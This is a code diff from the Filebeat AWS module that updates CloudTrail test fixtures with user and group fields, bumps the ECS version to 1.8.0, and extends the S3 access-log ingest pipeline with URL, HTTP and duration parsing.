a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json index 886d94486ad5..f6bb959a8d6c 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json @@ -29,6 +29,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -70,6 +73,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 720, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json index 4d715f617695..ca6b38754cb3 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "JohnDoe" + ], "service.type": "aws", "source.address": "192.0.2.110", "source.ip": "192.0.2.110", @@ -82,6 +85,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 658, + "related.user": [ + "JaneDoe" + ], "service.type": "aws", "source.address": "192.0.2.100", "source.ip": "192.0.2.100", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json index 9736605a6b2c..bfce5b07ccb4 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json @@ -38,6 +38,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -48,6 +49,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json index c3a33c948e4a..7487c6d6581d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json @@ -36,8 +36,13 @@ "creation" ], "fileset.name": "cloudtrail", + "group.id": "EXAMPLE_ID", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -80,8 +85,12 @@ "creation" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 903, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json index 41cca74d099d..f2ce56d3683e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "72.21.198.64", "source.as.number": 16509, diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json index e358d16bc725..66e126a2da2c 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json @@ -41,6 +41,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json index 2fee7445e824..65b0db2d2939 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,8 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.id": "EXAMPLEUSERID", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.3.2 Python/2.7.5 Windows/7", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json index aa2b7a2bc631..5ab34b15c5fa 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json @@ -34,6 +34,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json index 3c062a8ef234..2639ed8a4905 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json @@ -44,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Alice", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json index 2ea8b42fa6c4..8146718df72b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json @@ -34,6 +34,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json index 687e46021948..d1c2ab6f9e79 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json @@ -30,8 +30,12 @@ "deletion" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -74,8 +78,12 @@ "deletion" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 747, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json index 8c3897af7957..d1f4415d4cdd 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json @@ -34,6 +34,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json index 09ad2ddf9d41..58a7d7a36adb 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json @@ -24,6 +24,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json index b97cdbab3dfe..ac0c0163b5da 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json index d770587f6484..ec713a1c41b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json index ae3605a03a0a..f89c1b5ab536 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json @@ -25,6 +25,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "REDACTED" + ], "service.type": "aws", "source.address": "REDACTED", "tags": [ diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json index 1f9d3a519bbf..253bf3d45236 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json index c4ce4c167be9..419a86799cc8 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json @@ -31,9 +31,11 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "Admin", "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json index 586c1ee9421d..5d7299ae4c21 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json @@ -27,6 +27,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json index b3670ee5faca..266cded86f2e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json @@ -27,6 +27,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json index 0c517b2c688f..4b30eaed7ae3 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json @@ -35,6 +35,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -45,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json index e08eea3d071d..edb7444604be 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json @@ -37,6 +37,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json index 09c00b8d57b9..95827327cec2 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json @@ -28,8 +28,12 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -74,8 +78,12 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP2", "input.type": "log", "log.offset": 683, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json index 174bae15aa17..6992dc1a9786 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json index 204ae7e2e1e0..12efc4cf0711 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json @@ -35,6 +35,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -45,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" @@ -85,6 +87,7 @@ "input.type": "log", "log.offset": 800, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -95,6 +98,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json index 1531a7c1e5a3..1d00ae0c1718 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json @@ -25,6 +25,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "205.251.233.182", "source.as.number": 16509, @@ -92,6 +95,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 766, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json index 08769b6dcca4..068c1db631a5 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json @@ -31,6 +31,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob", "Robert" ], @@ -40,8 +41,10 @@ "tags": [ "forwarded" ], + "user.changes.name": "Robert", "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Spider", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json index 0464fe184a82..d81ec8fa25b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json @@ -45,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Alice", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/file.yml b/x-pack/filebeat/module/aws/ec2/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/ec2/config/file.yml +++ b/x-pack/filebeat/module/aws/ec2/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/elb/config/file.yml b/x-pack/filebeat/module/aws/elb/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/aws/elb/config/file.yml +++ b/x-pack/filebeat/module/aws/elb/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/file.yml b/x-pack/filebeat/module/aws/s3access/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/aws/s3access/config/file.yml +++ b/x-pack/filebeat/module/aws/s3access/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml b/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml index dd8613a904ad..4dea7d027c6f 100644 --- a/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml +++ b/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml @@ -1,6 +1,12 @@ description: "Pipeline for s3 server access logs" processors: + - set: + field: event.category + value: web + - append: + field: event.type + value: access - set: field: event.ingested value: '{{_ingest.timestamp}}' @@ -24,6 +30,22 @@ processors: S3ID: "[a-zA-Z0-9\\/_\\.\\-%+=]+" S3VERSION: "[a-zA-Z0-9.]+" + - grok: + field: aws.s3access.request_uri + ignore_failure: true + patterns: + - '%{NOTSPACE:http.request.method} %{NOTSPACE:url.original} [hH][tT][tT][pP]/%{NOTSPACE:http.version}' + + # + # Best-effort parse of url.original in the form /path?query" + # + - grok: + field: url.original + ignore_failure: true + patterns: + - '^%{ABS_PATH:url.path}(?:\?%{DATA:url.query})?$' + pattern_definitions: + ABS_PATH: '/[^?]*' - append: if: "ctx?.aws?.s3access?.bucket_owner != null" field: related.user @@ -99,10 +121,25 @@ processors: field: event.outcome value: success - - set: - field: event.duration - value: "{{aws.s3access.total_time}}" - ignore_empty_value: true + - convert: + field: aws.s3access.bytes_sent + target_field: http.response.body.bytes + type: long + ignore_failure: true + + - convert: + field: aws.s3access.total_time + target_field: event.duration + type: long + ignore_failure: true + + - script: + lang: painless + if: ctx.event?.duration != null + params: + MS_TO_NS: 1000000 + source: >- + ctx.event.duration *= params.MS_TO_NS; - set: field: http.request.referrer @@ -137,13 +174,18 @@ processors: field: event.kind value: event + # + # Save original message into event.original + # + - rename: + field: "message" + target_field: "event.original" + # # Remove temporary fields # - remove: - field: - - message - - _temp_ + field: _temp_ ignore_missing: true on_failure: diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json index 187f7f335891..aa9d1bf6938a 100644 --- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json @@ -23,12 +23,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "17", + "event.duration": 17000000, "event.id": "44EE8651683CB4DA", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -38,7 +43,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 0, "related.ip": [ @@ -54,6 +62,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -86,12 +97,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "3", + "event.duration": 3000000, "event.id": "E26222010BCC32B6", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -101,7 +117,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + 